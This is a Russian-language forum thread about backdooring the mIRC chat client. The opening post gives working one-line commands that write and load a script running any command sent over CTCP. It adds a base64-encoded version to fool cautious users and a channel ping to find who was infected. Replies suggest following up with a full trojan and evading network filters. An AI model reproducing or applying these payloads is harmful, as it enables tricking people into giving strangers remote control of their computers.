![]() |
mirc backdoor
Интернет кишит статьями о том что можно заразить mirc клиент простейшим бэкдором, который будет работать через ctcp запросы, везде он описывается так:
Код:
//write conf.mrc ctcp 1:*:?:$1- | Load -rs conf.mrcЧуть чуть поэкпериментировав пришли к такому бэкдору Код:
//write config.mrc ctcp ^*:*:*: { haltdef | $1- } | //Load -rs config.mrcЛучше просто обходить бдительных людей стороной или брать их на слабо :)) Благо mirc богат своими функциями и позволяет кодировать команды. В результате имеем такой код бэкдора Код:
//write conf.mrc $decode(Y3RjcCBeKjoqOio6IHsgaGFsdGRlZiB8ICQxLSB9,m) | load -rs conf.mrcПосле того как вы попестрите этим сообщением нужно собирать первые плоды - например ctcp запрос на канал, который выявит заразившихся: Код:
/ctcp #chan /ping $meВставим этот код в Скрипты(Alt+R)->Меню->Приват Код:
Троян |
вообще-то если ты такой бекдор успешно кому-то впарил, то тут уже можно и троян впаривать полноценный, главное знать хорошо командную строку. decode по умолчанию в мирке отключен, потому его сначала стоит включить
|
Цитата:
заметь тут написано что тема боян, но в нее внесен важный новый аспект - отсутствие палевности твоего присутствия |
Хы а кто миркой пользуеться? Лично я давно юзаю MegaIrc тама токого не катит :)...
|
Цитата:
сам mirc юзает минимальное количество людей, зато его производные и зточенные под себя скрипты юзает более половины пользователей IRC |
Кстати во многих крупных ирц сетях (например dogm.net) стоит фильтр на такое. Так что требуется более извращенный метод))
|
/me использует нулевой мирк с своими написаными сверху скриптами
|
| Время: 01:45 |